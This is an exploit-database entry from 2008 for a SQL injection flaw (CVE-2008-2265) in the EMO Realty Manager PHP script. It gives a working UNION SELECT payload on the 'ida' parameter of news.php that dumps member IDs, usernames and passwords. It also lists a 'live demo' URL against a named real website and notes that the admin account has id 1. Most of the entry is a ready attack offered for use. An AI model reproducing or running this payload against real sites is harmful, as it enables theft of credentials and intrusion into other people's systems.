EMO Realty Manager - 'ida' SQL Injection

Author: HaCkeR_EgY
type: webapps
platform: php
port: 
date_added: 2008-05-12  
date_updated: 2016-11-29  
verified: 1  
codes: OSVDB-45159;CVE-2008-2265  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5609.txt  

##########################################################
#                    Remote SQL Injection Vulnerabilities                                             #
#                           EMO Realty Manager                                                          #
##########################################################


## Author : HaCkeR_EgY

## C0NTACT : hacker_egy@hotmail.com


## H^OME : www.PAL-HaCkeR.com   &  ATSDP.COM


## Script Name : EMO Realty Manager


## Download : http://www.emophp.com/


## Price : Manager Full License CAD $399   /// Manager Base License CAD $299=======>  Buy iT : http://www.emophp.com/purchase.php


###########################################################################
###########################################################################

## D0rk : mmmm...... U have 2 dork  ...Let's say use your Mind again  D:


## ExPlo!T :

=====>> http://target.com/path/pages/news.php?ida=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,id,member_name,member_password),4/**/from/**/members/*
## L!ve Dem0 :


======>>http://sellrentcanada.com/aaa/pages/news.php?ida=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,id,member_name,member_password),4/**/from/**/members/*

-----N0TE----  Admin INFO  have (id) number 1


################################################################################

[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "

[<>] Greetz : Mr.SQL , Mohamed el Arab ,F!resell, DaRk MaStEr , H-T Team , Stack-Terrorist

#################################################################################

# milw0rm.com [2008-05-13]